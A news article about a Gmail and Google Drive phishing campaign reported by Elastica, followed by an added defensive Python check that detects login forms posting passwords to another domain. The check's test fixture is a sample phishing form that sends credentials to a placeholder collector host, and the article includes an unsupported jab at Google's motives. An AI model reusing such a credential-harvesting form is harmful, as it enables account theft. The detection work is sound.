Gmail has been used to distribute emails containing links to bogus webpages hosted on Google Drive; the stolen credentials are then stored on a third-party domain.
Although researchers are not certain whether the Gmail account was compromised or the attackers simply created a phony account, the phishing emails were delivered with a 100% success rate, and Google's built-in spam filter was not able to detect them.
All components of this phishing attack were in perfect working condition when Elastica reported it to Google, just two weeks prior to this announcement. Surprisingly, the phishing pages have not been removed by the giant as of now, even after it was alerted two weeks ago. Perhaps Google is waiting for everyone to get to know about this in an attempt to lose users' trust, right? This is certainly not good.
Architect of Elastica Cloud Threat Labs, Dr. Aditya K Sood said, “In this particular incident, attackers were able to circumvent tight security controls and target Google users specifically to gain access to a multitude of services associated with Google accounts”.
Standard blacklisting of URLs and IP addresses isn't of much use because the bogus webpages are hosted on Google Drive. Typical intrusion detection and prevention systems can't provide any aid in such scenarios either. It goes without saying that attackers can sell the stolen credentials on the online black market, or simply use them for malicious purposes. As the user base of Google services is exceptional, the risks are beyond our imagination as well.
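The limitation described above can be seen in a small defensive check. This is an added example, not code from the article or from Elastica. It contrasts a host-only blocklist lookup with a content check that flags a password form posting to a different host than the one serving the page. It assumes the fake login form submits directly to the third-party domain (the article only says credentials are stored there), and all hostnames and HTML are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class CredentialFormFinder(HTMLParser):
    """Collects the action URL of every <form> that contains a password input."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.action = None      # resolved action of the form being parsed
        self.has_password = False
        self.actions = []       # actions of forms that hold a password field

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            # A missing or relative action resolves against the page URL.
            self.action = urljoin(self.page_url, attrs.get("action") or "")
            self.has_password = False
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password = self.action is not None

    def handle_endtag(self, tag):
        if tag == "form" and self.action is not None:
            if self.has_password:
                self.actions.append(self.action)
            self.action = None

def host_blocklisted(page_url, blocklist):
    """Host-reputation check: judges the page by its hosting domain only."""
    return urlparse(page_url).hostname in blocklist

def cross_domain_credential_posts(page_url, html):
    """Form actions that send a password field to a host other than the page's."""
    finder = CredentialFormFinder(page_url)
    finder.feed(html)
    finder.close()
    page_host = urlparse(page_url).hostname
    return [a for a in finder.actions if urlparse(a).hostname != page_host]

# Constructed sample: login page on a trusted file-hosting domain whose form
# submits to an unrelated third-party domain (all hostnames are placeholders).
PAGE_URL = "https://drive.trusted-host.example/host/abc123/login.html"
SAMPLE_HTML = """
<form action="https://collector.third-party.example/save.php" method="post">
  <input type="text" name="Email"><input type="password" name="Passwd">
</form>
<form action="/search"><input type="text" name="q"></form>
"""
BLOCKLIST = {"known-bad.example"}
```

On the sample, `host_blocklisted(PAGE_URL, BLOCKLIST)` returns `False` because the hosting domain has a clean reputation, while `cross_domain_credential_posts(PAGE_URL, SAMPLE_HTML)` returns the third-party collector URL.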
Below is the video of this phishing campaign in action: